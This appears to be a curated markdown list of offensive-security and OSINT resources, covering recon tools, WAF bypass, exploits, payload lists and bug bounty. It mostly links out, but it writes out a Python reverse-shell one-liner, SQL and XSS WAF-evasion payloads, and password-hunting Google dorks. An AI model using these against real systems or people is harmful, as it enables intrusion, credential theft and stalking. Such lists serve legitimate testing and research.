- [datasploit](https://github.com/DataSploit/datasploit): An #OSINT Framework to perform various recon techniques on Companies, People, Phone Number, Bitcoin Addresses, etc., aggregate all the raw data, and give data in multiple formats.
- [the-endorser](https://github.com/eth0izzle/the-endorser): An OSINT tool that allows you to draw out relationships between people on LinkedIn via endorsements/skills.
- [OSINT-y Goodness](https://medium.com/@InfoSecSherpa/osint-y-goodness-16-hathitrust-digital-library-8ad10643251f): HathiTrust Digital Library
- [OSINT Resources for 2019](https://medium.com/@micallst/osint-resources-for-2019-b15d55187c3f)
- [Awesome OSINT](https://github.com/jivoi/awesome-osint): 😱 A curated list of amazingly awesome OSINT
- OSINT-y Goodness, №14 - [Directory of Open Access Journals](https://medium.com/@InfoSecSherpa/osint-y-goodness-14-directory-of-open-access-journals-5eb94d673851)
- Twitter Analysis: [Identifying A Pro-Indonesian Propaganda Bot Network](https://www.bellingcat.com/news/2019/09/03/twitter-analysis-identifying-a-pro-indonesian-propaganda-bot-network/)
- [TWINT](https://github.com/twintproject/twint): An advanced Twitter scraping & OSINT tool written in Python that doesn't use Twitter's API, allowing you to scrape a user's followers, following, Tweets and more while evading most API limitations.
- [Breaking Mimblewimble’s Privacy Model](https://medium.com/dragonfly-research/breaking-mimblewimble-privacy-model-84bcd67bfe52): Mimblewimble’s privacy is fundamentally flawed. Using only $60/week of AWS spend, I was able to uncover the exact addresses of senders and recipients for 96% Grin transactions in real time.
- [snscrape](https://github.com/JustAnotherArchivist/snscrape): A social networking service scraper in Python
- Hack the planet with [ꓘamerka GUI](https://medium.com/@woj_ciech/hack-the-planet-with-%EA%93%98amerka-gui-ultimate-internet-of-things-industrial-control-systems-5ff7d9686b29) — Ultimate Internet of Things/Industrial Control Systems reconnaissance tool. [twitter announcement](https://twitter.com/the_wojciech/status/1192133177722261505), [github](https://github.com/woj-ciech/Kamerka-GUI). ICS/IoT search: [ꓘamerka](https://woj-ciech.github.io/kamerka-demo/kamerka.html). [Kamerka OSINT tool shows your country's internet-connected critical infrastructure](https://www.zdnet.com/article/kamerka-osint-tool-shows-your-countrys-internet-connected-critical-infrastructure/)
- [dmi-tcat](https://github.com/digitalmethodsinitiative/dmi-tcat)/Digital Methods Initiative - Twitter Capture and Analysis Toolset.
- [KnockKnock](https://github.com/harleo/knockknock): A simple reverse whois lookup CLI which allows you to find domain names owned by an individual person or company, often used for Open Source Intelligence (OSINT) purposes.
- [From email to phone number, a new OSINT approach](https://www.martinvigo.com/email2phonenumber/)
- [recox](https://github.com/samhaxr/recox): Master script for web reconnaissance
- [openSquat](https://github.com/atenreiro/opensquat) is an opensource Intelligence (OSINT) R&D project to identify cyber squatting threats to specific companies or domains, such as domain squatting, typo squatting, IDN homograph attacks, phishing and scams.
- [Trace Labs Kali Linux build configuration](https://github.com/tracelabs/tlosint-live): [Trace Labs OSINT Linux Distribution based on Kali](https://www.tracelabs.org/trace-labs-osint-vm/).
- [natlas](https://github.com/natlas/natlas): Scaling Network Scanning. Changes prior to 1.0 may cause difficult to avoid backwards incompatibilities. You've been warned.
- [sifter](https://github.com/s1l3nt78/sifter): is a osint, recon & vulnerability scanner. It combines a plethara of tools within different module sets in order to quickly perform recon tasks, check network firewalling, enumerate remote and local hosts, and scan for the 'blue' vulnerabilities within microsft and if unpatched, exploit them.
- [Kitsune](https://github.com/evilsocket/kitsune): An artificial neural network to detect automated Twitter accounts (bots).
- [Image "Cloaking" for Personal Privacy](https://sandlab.cs.uchicago.edu/fawkes/). [Fawkes: Protecting Privacy against Unauthorized Deep Learning Models](http://people.cs.uchicago.edu/~ravenben/publications/pdf/fawkes-usenix20.pdf)
- (pt-br) [OSINT-Brazuca](https://github.com/osintbrazuca/OSINT-Brazuca): Repositório criado com intuito de reunir informações, fontes(websites/portais) e tricks de OSINT dentro do contexto Brasil.
- [WhatsMyName](https://whatsmyname.app/): This tool allows you to enumerate usernames across many websites.
- [Maltego Transforms for WhatsMyName](https://github.com/TURROKS/Maltego_WhatsMyName)
- [shadowbanned](https://shadowban.eu/): Shadowban Tester for Twitter [code](https://github.com/shadowban-eu/shadowban-eu-frontend)
- [sherlock](https://github.com/sherlock-project/sherlock): Hunt down social media accounts by username across social networks
- [usufy](https://github.com/i3visio/usufy) is a GPLv3+ piece of software that checks the existence of a profile for a given user in a bunch of different platforms. It uses the error messages displayed by most platforms when a user profile has not been found as the evidence of the existence or not of a given profile.
- [osrf](https://github.com/i3visio/osrframework): OSRFramework, the Open Sources Research Framework is a AGPLv3+ project by i3visio focused on providing API and tools to perform more accurate online researches.
- [IntelMQ](https://intelmq.readthedocs.io/): A tool-suite solution for IT security teams (CERTs & CSIRTs, SOCs abuse departments, etc.) for collecting and processing security feeds using a message queuing protocol. Its main goal is to give to incident responders an easy way to collect & process threat intelligence thus improving the incident handling processes of CERTs.
- (ru) [OSINT SAN Framework.](https://osintsan.ru/): OSINT-SAN Framework makes it possible to quickly find information and de-anonymize Internet users. The software is a framework that contains 30 functions for searching information or de-anonymizing users. With the help of my software, you can collect information about users on the Internet, anonymously and without special skills.
- [Scrummage](https://github.com/matamorphosis/Scrummage): The Ultimate OSINT and Threat Hunting Framework.
- [viper](https://github.com/FunnyWolf/Viper): Intranet pentesting tool with webui 开源图形化内网渗透工具
- [⡷⠂𝚔𝚊𝚛𝚖𝚊 𝚟𝟸⠐⢾](https://github.com/Dheerajmadhukar/karma_v2) is a Passive Open Source Intelligence (OSINT) Automated Reconnaissance (framework)
- [3WiFi](http://3wifi.stascorp.com/map): Free Wireless Database. [repo](https://github.com/binarymaster/3WiFi)
- [Stealth plane in flight](https://www.google.com/maps/place/39%C2%B001'18.5%22N+93%C2%B035'40.5%22W/@39.0217135,-93.5945882,163m/data=!3m1!1e3!4m5!3m4!1s0x0:0xd87af7588b9c362e!8m2!3d39.0218056!4d-93.5945833)
- [ExportData](https://www.exportdata.io/) - Twitter data export tool. Allows downloading historical tweets since 2006, exporting followers & followings and collects historical trends in 467 locations.
- [DetectDee](https://github.com/piaolin/DetectDee): Hunt down social media accounts by username, email or phone across social networks.

#### OSINT Webscraping

- [OSINT framework](https://osintframework.com/) focused on gathering information from free tools or resources.
- [h8mail](https://github.com/khast3x/h8mail): Password Breach Hunting & Email OSINT tool, locally or using premium services. Supports chasing down related email
- [PwnBin](https://github.com/kahunalu/pwnbin): Python Pastebin Webcrawler that returns list of public pastebins containing keywords
- [ODBParser](https://securityonline.info/odbparser-osint-tool/): OSINT tool to search, parse and dump only the open Elasticsearch and MongoDB directories.
- [pastego](https://github.com/notdodo/pastego): Scrape/Parse Pastebin using GO and expression grammar (PEG)
- [Instagram Scraper](https://github.com/arc298/instagram-scraper): Scrapes an instagram user's photos and videos
- [galer](https://github.com/dwisiswant0/galer): A fast tool to fetch URLs from HTML attributes by crawl-in.
- [How to bypass CloudFlare bot protection ?](https://jychp.medium.com/how-to-bypass-cloudflare-bot-protection-1f2c6c0c36fb)
- [SpyScrap](https://github.com/RuthGnz/SpyScrap): CLI and GUI for OSINT. Are you very exhibited on the Internet? Check it! Twitter, Tinder, Facebook, Google, Yandex, BOE. It uses facial recognition to provide more accurate results.F
- [pwnedOrNot](https://github.com/thewhiteh4t/pwnedOrNot) OSINT Tool for Finding Passwords of Compromised Email Addresses.
- [dorking](https://www.alec.fyi/dorking-how-to-find-anything-on-the-internet.html) (how to find anything on the Internet)
- [Complete Google Dorks List in 2020 For Ethical Hacking and Penetration Testing](https://gbhackers.com/latest-google-dorks-list/)
- Some google Dorks examples:
```# example
site:trello.com intext:password

"Please log in with router's password"
```
- [The closer a username/email address resembles other username/email addresses associated w/ a target, the easier it is to find (or guess &/or 'bruteforce') other usernames/email addresses associated w/ that target.](https://twitter.com/hackermaderas/status/1456016390935257089)
- [DorkGenius](https://dorkgenius.com/): Generate custom dorks for Google, Bing, DuckDuckGo, & more!

#### OSINT Chats

- [chatter](https://github.com/visualbasic6/chatter): internet monitoring osint telegram bot for windows
- [Slackhound](https://github.com/BojackThePillager/Slackhound): Slackhound allows red and blue teams to perform fast reconnaissance on Slack workspaces/organizations to quickly search user profiles, locations, files, and other objects.
- [ail-feeder-telegram](https://github.com/ail-project/ail-feeder-telegram): External telegram feeder for AIL framework.
- [MODIFYING TELEGRAM'S "PEOPLE NEARBY" FEATURE TO PINPOINT PEOPLE'S HOMES](https://owlspace.xyz/cybersec/tg-nearby/)
- [signald](https://signald.org/): unofficial daemon for interacting with Signal
- [Telegram messenger CLI](https://github.com/kenorb-contrib/tg): `telegram-cli` for Telegram IM.
- [TelegramScraper](https://github.com/TechRahul20/TelegramScraper): Telegram scraping tool for researching mis-/disinformation and investigating shade goings on.
- [OSINT-Discord-resources](https://github.com/Dutchosintguy/OSINT-Discord-resources): Some OSINT Discord resources.

### Vulnerability

- [Striker](https://github.com/UltimateHackers/Striker) is an offensive information and vulnerability scanner
- [SQL Vulnerability Scanner](https://github.com/WhitewidowScanner/whitewidow)
- [Decentralized Application Security Project](https://www.dasp.co/), [github](https://github.com/CryptoServices/dasp)
- [Introduction to IDAPython for Vulnerability Hunting — Somerset Recon](http://www.somersetrecon.com/blog/2018/7/6/introduction-to-idapython-for-vulnerability-hunting)
- [Beating the OWASP Benchmark](https://blog.shiftleft.io/beating-the-owasp-benchmark-24a7b1601031)
- [CMSScan](https://github.com/ajinabraham/CMSScan): Scan Wordpress, Drupal, Joomla, vBulletin websites for Security issues.
- [Meteor Blind NoSQL Injection](https://medium.com/rangeforce/meteor-blind-nosql-injection-29211775cd01)
- [Security Bulletins that relate to Netflix Open Source](https://github.com/Netflix/security-bulletins)
- [tsunami-security-scanner](https://github.com/google/tsunami-security-scanner): Tsunami is a general purpose network security scanner with an extensible plugin system for detecting high severity vulnerabilities with high confidence.
- [Testing docker CVE scanners. Part 2.5 — Exploiting CVE scanners](https://medium.com/@matuzg/testing-docker-cve-scanners-part-2-5-exploiting-cve-scanners-b37766f73005), [repo](https://github.com/gmatuz/cve-scanner-exploiting-pocs)
- [New NAT/Firewall Bypass Attack Lets Hackers Access Any TCP/UDP Service](https://thehackernews.com/2020/11/new-natfirewall-bypass-attack-lets.html). [NAT Slipstreaming](https://github.com/samyk/slipstream) allows an attacker to remotely access any TCP/UDP services bound to a victim machine, bypassing the victim’s NAT/firewall, just by the victim visiting a website. [there is a version 2](https://samy.pl/slipstream/). video: [Understanding Nat Slipstreaming](https://www.youtube.com/watch?v=8hrONVL5Syk)
- [openVulnQuery](https://github.com/CiscoPSIRT/openVulnQuery): A Python-based client for the Cisco openVuln API
- [HellRaiser](https://github.com/m0nad/HellRaiser): Vulnerability Scanner
- [Open-Source Vulnerability Intelligence Center](https://makyotox.medium.com/patrowlhears-open-source-vulnerability-intelligence-center-a8577c462257): [PatrowlHears](https://github.com/Patrowl/PatrowlHears) - Vulnerability Intelligence Center / Exploits
- [Vagrant GVM/Openvas](https://github.com/isaqueprofeta/gvm-vagrant): GVM/Openvas vulnerability scanner in Alpine with Vagrant.
- [How to Have a Cybersecurity Graph Database on Your PC](https://neo4j.com/developer-blog/how-to-have-a-cybersecurity-graph-database-on-your-pc/)
- [On the Security Vulnerabilities of Text-to-SQL Models](https://arxiv.org/pdf/2211.15363.pdf)

### WAFs

- [Web Application Penetration Testing Course URLs](https://docs.google.com/document/d/101EsKlu41ICdeE7mEv189SS8wMtcdXfRtua0ClYjP1M/edit)
- [Web Application Penetration Testing Notes](https://techvomit.net/web-application-penetration-testing-notes/)
- [quarantyne](https://github.com/quarantyne/quarantyne): Modern Web Firewall: stop account takeovers, weak passwords, cloud IPs, DoS attacks, disposable emails
- [Sitadel](https://github.com/shenril/Sitadel): Web Application Security Scanner.
- [WAF through the eyes of hackers](https://habr.com/ru/company/dsec/blog/454592/)
- [Some nice payloads to bypass XSS WAF](https://twitter.com/Edu4rdSHL/status/1168518772052959232):

``` html
'';!--"=&{()}





```

- CloudFlare XSS Bypass:

```

```

- [Some MySQL tricks to break some #WAFs out there.](https://twitter.com/brutelogic/status/1189184204073885697)

```sql

SELECT-1e1FROM`test`
SELECT~1.FROM`test`
SELECT\NFROM`test`
SELECT@^1.FROM`test`
SELECT-id-1.FROM`test`
```

- [another one](https://twitter.com/netspooky/status/1398364058353553408):

```javascript
jaVasCript:/*-/*`/*\`/*'/*"/**/( oNcliCk=alert() )//%0D%0a%0d%0A//\x3csVg/\x3e
```

- [bypassing moderning web application firewalls](https://www.slideshare.net/slideshow/embed_code/key/bFjIDLqM8iVZ48)
- [WAFW00F](https://github.com/EnableSecurity/wafw00f) allows one to identify and fingerprint Web Application Firewall (WAF) products protecting a website.
- [Bypassing Cloudflare WAF with the origin server IP address](https://blog.detectify.com/2019/07/31/bypassing-cloudflare-waf-with-the-origin-server-ip-address/)
- [WAF-Hook](https://github.com/xlabssecurity/WAF-Hook)
- How to find real IP of a site behind cloudflare.
- [Cloudfail tool](./#Cloud)
- Securitytrails historical data
- Sent email on non-existent email with hope to receive back real ip in header
- [Shadowcrypt Cloudflare resolve](https://shadowcrypt.net/tools/cloudflare)
- [Behindflare tool](https://github.com/alebeta90/behindflare)
- Builtwith relationship
- Crt.sh/Censys cert lookup
- Zoomeye/Shodan
- Intelx.io pastes for the domain
- [Wordpress technique](https://blog.nem.ec/2020/01/22/discover-cloudflare-wordpress-ip/)
- Maybe historical whois will show the originating IP. Some people add CloudFlare AFTER the site is set up. I 'd try RiskIQ...I've had better luck than with SecurityTrails. You can also try FarSight, Shodan, BinaryEdge, and ZoomEye to see if you can find anything.
- [A Scientific Notation Bug in MySQL left AWS WAF Clients Vulnerable to SQL Injection](https://www.gosecure.net/blog/2021/10/19/a-scientific-notation-bug-in-mysql-left-aws-waf-clients-vulnerable-to-sql-injection/)

### Exploits

- [IOSurface exploit](https://github.com/Siguza/v0rtex)
- [Attacking a co-hosted VM: A hacker, a hammer and two memory modules](https://thisissecurity.stormshield.com/2017/10/19/attacking-co-hosted-vm-hacker-hammer-two-memory-modules/)
- [How To Create a Metasploit Module](https://penetrate.io/2013/12/16/how-to-create-a-metasploit-module/)
- [Installing Metasploit Pro, Ultimate, Express, and Community](https://metasploit.help.rapid7.com/docs/installing-metasploit-pro)
- [unfurl](https://github.com/JLospinoso/unfurl), [An Entropy-Based Link Vulnerability Analysis Tool](https://jlospinoso.github.io/python/unfurl/abrade/hacking/2018/02/08/unfurl-url-analysis.html)
- [A collection of vulnerable ARM binaries for practicing exploit development](https://github.com/Billy-Ellis/Exploit-Challenges)
- [A collection of PHP exploit scripts](https://github.com/mattiasgeniar/php-exploit-scripts)
- [Sage ACF Blocks](https://github.com/generoi/sage-acfblocks): A Sage 10 helper package for building ACF blocks rendered using blade templates.
- [WebKit exploit](https://github.com/Cryptogenic/Exploit-Writeups/blob/master/WebKit/setAttributeNodeNS%20UAF%20Write-up.md)
- [Modern Binary Exploitation - Spring 2015](http://security.cs.rpi.edu/courses/binexp-spring2015/)
- (video) [Python 2 vs 3 for Binary Exploitation Scripts](https://www.youtube.com/watch?v=FxNS-zSS7MQ)
- [DriveCrypt](https://github.com/shjalayeri/DriveCrypt): DriveCrypt Dcr.sys vulnerability exploit
- [Faxploit](https://research.checkpoint.com/sending-fax-back-to-the-dark-ages/): Sending Fax Back to the Dark Ages
- [beebug](https://github.com/invictus1306/beebug): A tool for checking exploitability
- [NAVEX](https://blog.acolyer.org/2018/09/10/navex-precise-and-scalable-exploit-generation-for-dynamic-web-applications/): Precise and scalable exploit generation for dynamic web applications
- [Three New DDE Obfuscation Methods](https://blog.reversinglabs.com/blog/cvs-dde-exploits-and-obfuscation)
- [SILENTTRINITY](https://github.com/byt3bl33d3r/SILENTTRINITY): A post-exploitation agent powered by Python, IronPython, C#/.NET
- [fuxploider](https://github.com/almandin/fuxploider): File upload vulnerability scanner and exploitation tool.
- [Jailbreaks Demystified](https://geosn0w.github.io/Jailbreaks-Demystified/) – GeoSn0w – Programmer. Hacking stuff.
- [Attacking Google Authenticator](https://www.unix-ninja.com/p/attacking_google_authenticator)
- [Pacu](https://github.com/RhinoSecurityLabs/pacu): The AWS exploitation framework, designed for testing the security of Amazon Web Services environments. [installation guide](https://github.com/RhinoSecurityLabs/pacu/wiki/Installation), [starting guide](https://www.kitploit.com/2018/11/pacu-aws-exploitation-framework.html)
- Glibc Heap Exploitation Basics:
- [Introduction to ptmalloc2 internals (Part 1)](https://blog.k3170makan.com/2018/11/glibc-heap-exploitation-basics.html)
- [ptmalloc2 internals (Part 2)](https://blog.k3170makan.com/2018/12/glibc-heap-exploitation-basics.html) - Fast Bins and First Fit Redirection
- [movfuscator](https://github.com/xoreaxeaxeax/movfuscator): The single instruction C compiler
- [beebug](https://github.com/invictus1306/beebug): A tool for checking exploitability
- [UEFI vulnerabilities classification focused on BIOS implant delivery](https://medium.com/@matrosov/uefi-vulnerabilities-classification-4897596e60af) and [What makes OS drivers dangerous for BIOS?](https://medium.com/@matrosov/dangerous-update-tools-c246f7299459)
- [MikroTik Firewall & NAT Bypass](https://medium.com/tenable-techblog/mikrotik-firewall-nat-bypass-b8d46398bf24)
- [3D Accelerated Exploitation](https://github.com/mwrlabs/3d-accelerated-exploitation): The content of this repository is meant to be the official release of the tooling/exploit that was discussed during the OffensiveCon 2019 talk - 3D Accelerated Exploitation. The talk dealt with research into the VirtualBox 3D Acceleration feature, which is backed by a software component called Chromium.
- [GhostDelivery](https://github.com/s1egesystems/GhostDelivery): Python script to generate obfuscated .vbs script that delivers payload (payload dropper) with persistence and windows antivirus disabling functions.
- [Beat the hole in the ATM](https://medium.com/nightst0rm/t%E1%BA%A3n-m%E1%BA%A1n-v%E1%BB%81-l%E1%BB%97-h%E1%BB%95ng-trong-atm-diebold-f1040a70f2c9): hacking an diebold ATM.
- [RedGhost](https://github.com/d4rk007/RedGhost): Linux post exploitation framework designed to assist red teams in gaining persistence, reconnaissance and leaving no trace.
- [PowerSploit](https://github.com/PowerShellMafia/PowerSploit): is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment.
- [Z-Shave. Exploiting Z-Wave downgrade attacks](https://www.pentestpartners.com/security-blog/z-shave-exploiting-z-wave-downgrade-attacks/)
- [Totally Pwning the Tapplock Smart Lock](https://www.pentestpartners.com/security-blog/totally-pwning-the-tapplock-smart-lock/) - Andrew Tierney 13 Jun 2018
- [I found myself in need of a much shorter python reverse oneliner than shellpop provides by default. Here's what I landed on. 🙃](https://twitter.com/epi052/status/1177345422572044289): python -c "import pty,socket;h,p='192.168.200.1',12345;socket.create_connection((h,p));pty.spawn('/bin/sh');"
- [The Art of WebKit Exploitation](http://blog.umangis.me/the-art-of-webkit-exploitation/)
- [PEASS](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite): Privilege Escalation Awesome Scripts SUITE.
- [Patchless AMSI bypass using SharpBlock](https://www.pentestpartners.com/security-blog/patchless-amsi-bypass-using-sharpblock/)
- [Lets Create An EDR… And Bypass It! Part 1](https://ethicalchaos.dev/2020/05/27/lets-create-an-edr-and-bypass-it-part-1/)
- [Lets Create An EDR… And Bypass It! Part 2](https://ethicalchaos.dev/2020/06/14/lets-create-an-edr-and-bypass-it-part-2/)
- [SharpBlock](https://github.com/CCob/SharpBlock): A method of bypassing EDR's active projection DLL's by preventing entry point exection. [SylantStrike](https://github.com/CCob/SylantStrike): Simple EDR implementation to demonstrate bypass.
- [Bypassing Antivirus with Golang – Gopher it!](https://labs.jumpsec.com/2019/06/20/bypassing-antivirus-with-golang-gopher-it/)
- [The Invoke-CradleCrafter Overview](https://www.danielbohannon.com/blog-1/2017/12/2/the-invoke-cradlecrafter-overview)
- [DVS](https://github.com/ScorpionesLabs/DVS): D(COM) V(ulnerability) S(canner) AKA Devious swiss army knife - Lateral movement using DCOM Objects.
- [The Exploit Database Git Repository](https://github.com/offensive-security/exploitdb)
- [Vulnerability Lab](https://www.vulnerability-lab.com/): helps with the world's first independent bug bounty hacker community. Leverage their skills and creativity to surface your critical vulnerabilities before criminals can exploit them.
- [0day.Today](https://0day.today/): Biggest Exploits Database and 0day market - The Underground, is one of the world's most popular and comprehensive computer security web sites.
- [cxsecurity](https://cxsecurity.com/exploit/): is an open project developed and moderated fully by one independent person.
- [Security Focus](https://www.securityfocus.com/vulnerabilities)
- packet storm: [Exploit Files](https://packetstormsecurity.com/files/tags/exploit/)
- [Graphology of an Exploit](https://research.checkpoint.com/2020/graphology-of-an-exploit-volodya/): Hunting for exploits by looking for the author’s fingerprints
- [Traditional Buffer Overflow Windows cheatsheet](https://sec4us.com.br/cheatsheet/bufferoverflow-windows)
- [Exploit writing tutorial part 3 : SEH Based Exploits](https://www.corelan.be/index.php/2009/07/25/writing-buffer-overflow-exploits-a-quick-and-basic-tutorial-part-3-seh/)
- [Vulnerability DB](https://snyk.io/vuln): Detailed information and remediation guidance for known vulnerabilities.
- [mssqlproxy](https://github.com/blackarrowsec/mssqlproxy) is a toolkit aimed to perform lateral movement in restricted environments through a compromised Microsoft SQL Server via socket reuse.
- [Script to decode .vbe files](https://www.helviojunior.com.br/uncategorized/script-para-decodificar-arquivos-vbe-script-to-decode-vbe-files/)
- [A First Introduction to System Exploitation](https://research.checkpoint.com/wp-content/uploads/2020/03/pwnable_writeup.pdf)
- [AllPocsFromHackerOne](https://github.com/bminossi/AllVideoPocsFromHackerOne): This script grabs public report from hacker one and download all JSON files to be grepable.
- [How I Found My First Ever ZeroDay (In RDP)](https://www.malwaretech.com/2020/12/how-i-found-my-first-ever-zeroday-in-rdp.html)
- Learning Linux Kernel Exploitation: [Part 1](https://lkmidas.github.io/posts/20210123-linux-kernel-pwn-part-1/), [Part 2](https://lkmidas.github.io/posts/20210128-linux-kernel-pwn-part-2/)
- [SharpSelfDelete](https://github.com/klezVirus/SharpSelfDelete): C# implementation of the research by @jonaslyk and the drafted PoC from @LloydLabs
- [preeny](https://github.com/zardus/preeny): Some helpful preload libraries for pwning stuff.
- [Exploits, Vulnerabilities and Payloads: Practical Introduction](https://www.infosecmatter.com/exploits-vulnerabilities-and-payloads-practical-introduction/)
- [Beginners Guide to 0day/CVE AppSec Research](https://0xboku.com/2021/09/14/0dayappsecBeginnerGuide.html)
- [0days In-The-Wild](https://googleprojectzero.github.io/0days-in-the-wild/) - Hello! This site aims to be a central repository for information about 0-days exploited in-the-wild! It's maintained by Google Project Zero.
- [Sticky notes for pentesting.](https://exploit-notes.hdks.org/) [repo](https://github.com/hideckies/exploit-notes)

### Payloads

- [Payloads Collection](https://twitter.com/Alra3ees/status/1213287810440081408) by @alra3ees:
- [Command Injection Payload List](https://github.com/payloadbox/command-injection-payload-list)
- [Cross Site Scripting (XSS) Vulnerability Payload List](https://github.com/payloadbox/xss-payload-list)
- [XML External Entity (XXE) Injection Payload List](https://github.com/payloadbox/xxe-injection-payload-list): XML External Entity (XXE) Injection Payload List
- [SQL Injection Payload List](https://github.com/payloadbox/sql-injection-payload-list): SQL Injection Payload List
- Some SQL Injection Bypassing ![WAF Methods](img/sqlinjwaf.jpeg)
- [RFI/LFI Payload List](https://github.com/payloadbox/rfi-lfi-payload-list).
- [Open Redirect Payload List](https://github.com/payloadbox/open-redirect-payload-list)
- MSFVenom:
- (pt-br) [Criando Payloads de Shell Reverso com MSFVenom](https://www.tiforense.com.br/criando-payloads-de-shell-reverso-com-msfvenom/)
- [MSFVenom Reverse Shell Payload Cheatsheet (with & without Meterpreter)](https://infinitelogins.com/2020/01/25/msfvenom-reverse-shell-payload-cheatsheet/)
- [MSFVenom - CheatSheet](https://book.hacktricks.xyz/shells/shells/msfvenom)
- [Hiding Metasploit Shellcode to Evade Windows Defender](https://www.rapid7.com/blog/post/2018/05/03/hiding-metasploit-shellcode-to-evade-windows-defender/)
- [Creating Metasploit Payloads](https://netsec.ws/?p=331)
- [Shikata Ga Nai Encoder Still Going Strong](https://www.mandiant.com/resources/shikata-ga-nai-encoder-still-going-strong)
- [BYPASSING ANTIVIRUS WITH MSFVENOM](https://defensehorizon.com/2018/07/26/msfvenom/)
- [MSFVenom Cheatsheet](https://ironlinux.com.br/msfvenom-cheatsheet/)
- [Payload Delivery for DevOps](https://khast3x.club/posts/2020-06-27-Cross-Platform-Dropper/): Building a Cross-Platform Dropper Using the Genesis Framework, Metasploit and Docker. [code](https://github.com/gen0cide/gscript)
- [LaTex Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/LaTeX%20Injection)
- [Hiding malicious code with “Module Stomping”: Part 1](https://blog.f-secure.com/hiding-malicious-code-with-module-stomping/). [ModuleStomping](https://github.com/countercept/ModuleStomping)
- [Phantom-Evasion](https://github.com/oddcod3/Phantom-Evasion): Python antivirus evasion tool.
- [Steganography](https://github.com/ragibson/Steganography#WavSteg): Least Significant Bit Steganography for bitmap images (.bmp and .png), WAV sound files, and byte sequences. Simple LSB Steganalysis (LSB extraction) for bitmap images.
- [PyFuscation](https://github.com/CBHue/PyFuscation): Obfuscate powershell scripts by replacing Function names, Variables and Parameters.
- [Starting a handler with Metasploit](https://en.redinskala.com/starting-a-handler-with-metasploit/)
- [Reverse Shell Cheat Sheet](https://oscp.infosecsanyam.in/shells/reverse-shell-cheat-sheet)
- [System Calls](https://github.com/plackyhacker/Sys-Calls): An example of using Syscalls in C# to get a meterpreter shell.

#### Bug Bounty

- [Awesome one-liner bug bounty](https://www.scyllaforums.com/Thread/awesome-one-liner-bug-bounty.113/) [local copy](./web/oneliners.md)
- [bbrecon](https://github.com/serain/bbrecon) Python library and CLI for the Bug Bounty Recon API
- [RPC Bug Hunting Case Studies – Part 1](https://www.fortinet.com/blog/threat-research/the-case-studies-of-microsoft-windows-remote-procedure-call-serv)
- [Top Penetration Testing & Bug Hunting YouTube Channels you should follow](https://www.linkedin.com/posts/omarsalama_pentesting-bugbounty-vulnerabilities-activity-6734397230221938688-c2Jq) - Updated 11/19/2020
- [Our top tips for better bug bounty reports, plus a hacker contest!](https://about.gitlab.com/blog/2020/09/28/top-tips-for-better-bug-bounty-reports-and-a-hacker-contest/#celebrating-great-reports-and-great-reporters)
- [axiom](https://github.com/pry0cc/axiom): The dynamic infrastructure framework for anybody!
- [KindleDrip](https://medium.com/realmodelabs/kindledrip-from-your-kindles-email-address-to-using-your-credit-card-bb93dbfb2a08): From Your Kindle’s Email Address to Using Your Credit Card.
- [Amazon Kindle Vulnerabilities Could Have Led Threat Actors to Device Control and Information Theft](https://www.youtube.com/watch?v=BtpGVa7FaXo)
- This #OneLiner extracts all API endpoints from AngularJS & Angular javascript files:

```bash
curl -s URL | grep -Po "(\/)((?:[a-zA-Z\-_\:\.0-9\{\}]+))(\/)*((?:[a-zA-Z\-_\:\.0-9\{\}]+))(\/)((?:[a-zA-Z\-_\/\:\.0-9\{\}]+))" | sort -u
```

- [How I Might Have Hacked Any Microsoft Account](https://thezerohack.com/how-i-might-have-hacked-any-microsoft-account)
- [BugBountyScanner](https://github.com/chvancooten/BugBountyScanner): A Bash script and Docker image for Bug Bounty reconnaissance. Intended for headless use.
- [alert() is dead, long live print()](https://portswigger.net/research/alert-is-dead-long-live-print)
- The [Bug Bounty Reconnaissance Framework](https://github.com/honoki/bbrf-server) (BBRF) can help you coordinate your reconnaissance workflows across multiple devices
- [If you do use BBRF, here it is a initial script to use HackerOne API to gather all programs' scope, including your private programs.](https://gist.github.com/manoelt/2f05b991e08d9bcec4dcba9ae298b329)
- [KeyHacks](https://github.com/streaak/keyhacks) is a repository which shows quick ways in which API keys leaked by a bug bounty program can be checked to see if they're valid.
- [NotKeyHacks](https://gitlab.com/dee-see/notkeyhacks) is the opposite of the KeyHacks repository by @streaak. Sensitive tokens are fun, but a lot of time is wasted reading documentation only to figure out that the token you found named AppSecret is, somehow, not sensitive at all and meant to be public. This repository is meant to be an inventory of those tokens that look potentially sensitive but aren't so that we can just CTRL-F and save a lot of time.
- [Two Rights Might Make A Wrong](https://www.paradigm.xyz/2021/08/two-rights-might-make-a-wrong/)
- [You always hear stories about how bug bounty programs steal your bug, but very few people post about it, or have the 100% proof to show this.](https://twitter.com/jonathandata1/status/1432165054632402946)
- [OOB reads in network message handlers leads to RCE](https://hackerone.com/reports/807772)
- [Bug Bounty Resources](https://reconshell.com/bug-bounty-resources/)
- [Google Bug Hunters](https://bughunters.google.com/) Welcome to Google's Bug Hunting community
- [0-Day Hunting (Chaining Bugs/Methodology)](https://blog.riotsecurityteam.com/0day-chains)
- [KingOfBugBounty Project](https://github.com/KingOfBugbounty/KingOfBugBountyTips): Our main goal is to share tips from some well-known bughunters. Using recon methodology, we are able to find subdomains, apis, and tokens that are already exploitable, so we can report them. We wish to influence Onelinetips and explain the commands, for the better understanding of new hunters..

#### Web Exploitation

- [awesome-web-hacking](https://github.com/infoslack/awesome-web-hacking): A list of web application security.
- [gau](https://github.com/lc/gau): Fetch known URLs from AlienVault's Open Threat Exchange, the Wayback Machine, and Common Crawl.
- [malvun](malvuln.com/) is the first website exclusively dedicated to the research of security vulnerabilities within Malware itself.
- [Introducing CookieMonster](https://ian.sh/cookiemonster): a tool for breaking stateless authentication. [cokkiemonster](https://github.com/iangcarroll/cookiemonster/)
- [get-title](https://github.com/tomnomnom/hacks/tree/master/get-title)
- [Insecure Direct Object References](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Insecure%20Direct%20Object%20References#tools)
- [bugbounty-cheatsheet](https://github.com/EdOverflow/bugbounty-cheatsheet): A list of interesting payloads, tips and tricks for bug bounty hunters.
- [Awesome Bug Bounty](https://github.com/djadmin/awesome-bug-bounty): A comprehensive curated list of available Bug Bounty & Disclosure Programs and Write-ups.
- [ParamSpider](https://github.com/devanshbatham/ParamSpider): Mining parameters from dark corners of Web Archives.
- [Server Side Request Forgery](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Injection)
